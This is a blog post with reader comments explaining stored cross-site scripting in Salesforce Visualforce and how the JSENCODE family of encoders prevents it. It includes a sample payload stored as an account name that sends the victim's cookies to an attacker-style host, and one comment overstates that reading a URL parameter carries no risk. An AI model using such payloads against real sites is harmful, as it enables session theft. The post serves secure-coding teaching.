Continuing from my previous post, this time I would like to share what I know about the Stored XSS part.
Stored XSS is cross-site scripting where an attacker can inject code into the server's pages permanently, so the script runs whenever the page is rendered or an action is performed on it.
In other words:
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."
Let's have an example:
<apex:page standardController="Account">
<!-- standardController="Account" is needed for the Account.Name merge field to resolve -->
<script>
function crossXSS()
{
    // Vulnerable: the merge field is placed inside a JavaScript string literal without any encoding
    var xssExample = '{!Account.Name}' ;
}
</script>
<apex:form>
<apex:commandLink value="Click me" onclick="crossXSS();" />
</apex:form>
</apex:page>
Now suppose
Account Name is: testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';
This account name is then always present on the page inside the script block, and whenever the commandLink is clicked, crossXSS is called and its first line has become:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';
So again you can see that all the cookies will be sent to the attacker's site.
Repeating what I suggested in the previous post:
To prevent this, Salesforce provides encoding functions that are available on Visualforce pages, such as:
JSENCODE, HTMLENCODE, JSINHTMLENCODE, URLENCODE, etc.
So the code above can be updated as:
var xssExample = '{!JSENCODE(Account.Name)}';
So the value being merged into the page will now be encoded before it lands inside the script.
JSENCODE: To encode the properties in JavaScript.
HTMLENCODE: To encode the properties in HTML.
JSINHTMLENCODE: If calling a JavaScript method from an HTML component and passing the properties.
URLENCODE: If building a URL on the page.
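As an added example (not code from the original post), the snippet below builds the same script block as the Visualforce page with and without encoding, then parses and runs it the way the browser would, so you can see the unencoded merge field close the string literal and run its own statement while the encoded one stays an inert value. The jsEncode function is an assumed stand-in for Salesforce's JSENCODE, not its actual implementation, and STORED_NAME is a constructed sample value.

```javascript
// jsEncode: assumed stand-in for Visualforce JSENCODE (not Salesforce's code).
// Escapes the characters that can end a JS string literal or a <script> block.
function jsEncode(value) {
  return String(value).replace(/[\\'"<>\r\n\u2028\u2029]/g, function (ch) {
    switch (ch) {
      case '\\': return '\\\\';
      case "'": return "\\'";
      case '"': return '\\"';
      case '\r': return '\\r';
      case '\n': return '\\n';
      default: // <, >, U+2028, U+2029 become \uXXXX so "</script>" can never appear
        return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
    }
  });
}

// Build the script block exactly as the page does: the merge field sits inside a
// single-quoted JS string. The injected flag records whether any foreign statement ran.
function buildScript(accountName, encode) {
  var merged = encode ? jsEncode(accountName) : accountName;
  return "var injected = false;\n" +
         "var xssExample = '" + merged + "';\n" +
         "return { value: xssExample, injected: injected };";
}

// Parse and execute the generated block (new Function behaves like the browser's parser).
// Returns { value, injected }, or { error } when the block no longer parses at all.
function render(accountName, encode) {
  try {
    return new Function(buildScript(accountName, encode))();
  } catch (e) {
    return { error: e.name };
  }
}

// Constructed stored value: it closes the string literal and appends its own statement.
var STORED_NAME = "testName'; injected = true; var foo='";

// Unencoded: the stored data becomes code and the assignment to injected runs.
// Encoded: xssExample holds the stored text verbatim and nothing else executes.
console.log(render(STORED_NAME, false)); // { value: 'testName', injected: true }
console.log(render(STORED_NAME, true));  // { value: STORED_NAME, injected: false }
```

A plain apostrophe such as O'Brien shows the other failure mode: unencoded it is a SyntaxError that breaks every script on the page, encoded it round-trips unchanged.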
Please feel free to ask the questions/doubts. Suggestions are appreciated.
var xssExample = '{!JSENCODE(Account.Name})' ;
Invalid argument!!!!!!
How to encode? I tried all the ways.

Hi Amit, your order of closing brackets is wrong.
Try with {!JSENCODE(Account.Name)}

Hi, I am using this to read the parameter.
Before passing it to the URL I encode the parameter using JSENCODE in the JavaScript function.
The following line in the controller reads the parameter:
String temp = System.currentPageReference().getParameters().get('Amt');
Is there a risk?
Thanks
Sri

Hi Srikanta M,
There is no risk at all, but if you want to use this variable in a dynamic query then you need to "escapeSingleQuotes" it, like String.escapeSingleQuotes(temp), before using it in dynamic SOQL.
Thanks
Deepak Choudhary